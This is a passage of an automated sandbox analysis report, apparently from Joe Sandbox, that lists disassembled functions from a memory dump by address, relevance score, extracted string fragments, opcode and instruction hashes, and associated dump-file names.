                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 6m,d$9a_
                      • API String ID: 0-2999063875
                      • Opcode ID: d1ea8642b2c38f8de450252444ab614b271b41d16bbecdb8f445962234e95bfa
                      • Instruction ID: 54fb30cf9597bab45f9e75e01600e71958ae9ad246a2dbf496578cfb6bf466c8
                      • Opcode Fuzzy Hash: d1ea8642b2c38f8de450252444ab614b271b41d16bbecdb8f445962234e95bfa
                      • Instruction Fuzzy Hash: C0820AF3A08204AFE3046E2DED8567AFBEAEFD4720F1A453DE6C4C3744E53598058696
                      Function 0078D78A Relevance: 3.1, Strings: 2, Instructions: 570COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: H7w$o{{
                      • API String ID: 0-1645931659
                      • Opcode ID: edd230085061bdbcd44629192e04ed4a6d9a2e0006f7a25046914d0c739b29e6
                      • Instruction ID: 00de559689512e89e34c0ca60eaadd8db4ee64da8c5f3bd2908c3b26ac32a673
                      • Opcode Fuzzy Hash: edd230085061bdbcd44629192e04ed4a6d9a2e0006f7a25046914d0c739b29e6
                      • Instruction Fuzzy Hash: 4202D1F390C614AFE3046F29EC8167AFBE5EF94720F16892DEAC487744E63558408B97
                      Function 0079FFBA Relevance: 2.9, Strings: 2, Instructions: 430COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,\"$sT
                      • API String ID: 0-1071084986
                      • Opcode ID: f9dafe0c42868552738592aa823a22194f4f7a7e72db0b97e4bd9c751f62b560
                      • Instruction ID: 5275cc1d47b81a8c3f2177f7662382553ba869cb51fb122e00d5c92e736e4bac
                      • Opcode Fuzzy Hash: f9dafe0c42868552738592aa823a22194f4f7a7e72db0b97e4bd9c751f62b560
                      • Instruction Fuzzy Hash: C7D149F3A081009FE304AE2DEC8167AB7E6EFD4720F2A853DE6C4C3744E63558058697
                      Function 0079A946 Relevance: 2.0, Strings: 1, Instructions: 800COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7?w6
                      • API String ID: 0-3427518209
                      • Opcode ID: e9604add03ac2b7d46f2e5d0d042996ae2762dff12de3131a9de3f24b05bf5a6
                      • Instruction ID: 25496b371e2c6d772d0f591dd38eca7e0ee6ece7f636e3ece59a43afa6beff7f
                      • Opcode Fuzzy Hash: e9604add03ac2b7d46f2e5d0d042996ae2762dff12de3131a9de3f24b05bf5a6
                      • Instruction Fuzzy Hash: EE42E5F3908200AFE7046E2DEC8677ABBE9EF54720F1A492DEAC4D3340E63558148797
                      Function 00821705 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: GKQ
                      • API String ID: 0-2175118331
                      • Opcode ID: 9827ec2c6df446e76836113555c4324fa1f0ca78cc9775b3c173626b38317700
                      • Instruction ID: b3901099bb65c08e8e882245425aec512b1a80e21401164c215fda4b79084bf8
                      • Opcode Fuzzy Hash: 9827ec2c6df446e76836113555c4324fa1f0ca78cc9775b3c173626b38317700
                      • Instruction Fuzzy Hash: 1B51D3B251C218CFDB046E24EC8963ABBE5FFA0318F35892DE6C6C2654D63655C0DB53
                      Function 007437E9 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '`s>
                      • API String ID: 0-2433070117
                      • Opcode ID: 1e86b2717a4c65c0d29b9c1563943c41b50103789c9c56f82bb42d625b0d6ad8
                      • Instruction ID: 2a3617b95ea80c34d698288d3af60267dfb866bb48b0a6264228aa6ed44b18c6
                      • Opcode Fuzzy Hash: 1e86b2717a4c65c0d29b9c1563943c41b50103789c9c56f82bb42d625b0d6ad8
                      • Instruction Fuzzy Hash: 615136F3E182149BE3549E19DC1433AB7E6EF94720F1B493DEAC487380E93A5C408786
                      Function 0067EA6E Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: s7Vq
                      • API String ID: 0-2986973187
                      • Opcode ID: d453c8cbb47d247ef7268e65371dc82de3be124f13479eed154e93a0f7be97c9
                      • Instruction ID: 2ac3e8fb77b368cd695cd4ac1812c1596cf5f5b592dec6cbcf7ef07e3fd7899c
                      • Opcode Fuzzy Hash: d453c8cbb47d247ef7268e65371dc82de3be124f13479eed154e93a0f7be97c9
                      • Instruction Fuzzy Hash: 4D414BF3A0C2185FE7086D6EEC4577BBBE8DB80660F1A453EEAC5D7740ED7418018696
                      Function 00693790 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EGN
                      • API String ID: 0-2224417284
                      • Opcode ID: bfca637b9f9a2197b6d2c0d89998984fafc3e9869d963a845330445469c15d99
                      • Instruction ID: 63be07d3ced5ea95a1dee8eecd7b84a410cab55797160cf01e34a98f8e331b3d
                      • Opcode Fuzzy Hash: bfca637b9f9a2197b6d2c0d89998984fafc3e9869d963a845330445469c15d99
                      • Instruction Fuzzy Hash: D83100B36086145FE350AE2DDC867AAB7D6EFD8220F1B443DD6C4C7344D93498058686
                      Function 006A0D6C Relevance: .2, Instructions: 184COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5a71bc184930fadd3eeae85764901fa26699fc19af67f32913f1b93cc9f64ae2
                      • Instruction ID: 9efd1f2a4732eccdee143a3ac5b586e730cb012b94992c568b9df7bb11cf00d9
                      • Opcode Fuzzy Hash: 5a71bc184930fadd3eeae85764901fa26699fc19af67f32913f1b93cc9f64ae2
                      • Instruction Fuzzy Hash: F851E8B3A085105FF304AA3EDD9876BBBD7EBD5320F26863DDAC4C7784D93548068691
                      Function 00718945 Relevance: .2, Instructions: 177COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4b301d87dd6b93c0cc85e0335ff6febafbc4f35a418c0f71eeecde916e6e489f
                      • Instruction ID: 51a50e1e3feaa6550e9a3f602a193f242d58b375de4d2facbf107ce1a238d2bb
                      • Opcode Fuzzy Hash: 4b301d87dd6b93c0cc85e0335ff6febafbc4f35a418c0f71eeecde916e6e489f
                      • Instruction Fuzzy Hash: D4515CF3E052105FF348193CDD587BBB686DBD1320F2B833D9A9997BC4E87909054282
                      Function 0067BAB4 Relevance: .2, Instructions: 167COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: da1d0799685056a6c8789a5a68e206a9e1e219ac501ae16da73e39b26e27918e
                      • Instruction ID: 8effcd0fd3a483c39d0260b6b4de91ba046c026627412bdcfc324bbb38be62ac
                      • Opcode Fuzzy Hash: da1d0799685056a6c8789a5a68e206a9e1e219ac501ae16da73e39b26e27918e
                      • Instruction Fuzzy Hash: 714149F3E082206BE3106D1DDC887A6FBDAEB94760F1B463DDAC497780D5785C0586D2
                      Function 008984FD Relevance: .2, Instructions: 157COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0da88b27d1bd9cf3961658cf5b55d76935fcf8fa62f4e77e1ace8d1b621bdcee
                      • Instruction ID: 156d31dedcc6dba63852255d925a0b6a11c07530664b55bfb6d2a5c69e4e92ac
                      • Opcode Fuzzy Hash: 0da88b27d1bd9cf3961658cf5b55d76935fcf8fa62f4e77e1ace8d1b621bdcee
                      • Instruction Fuzzy Hash: 4451B0B320C60ADFDB047F29D84553AB7E5FF96324F2A492ED2C2C7244EA3445859B47
                      Function 003E9750 Relevance: .0, Instructions: 15COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
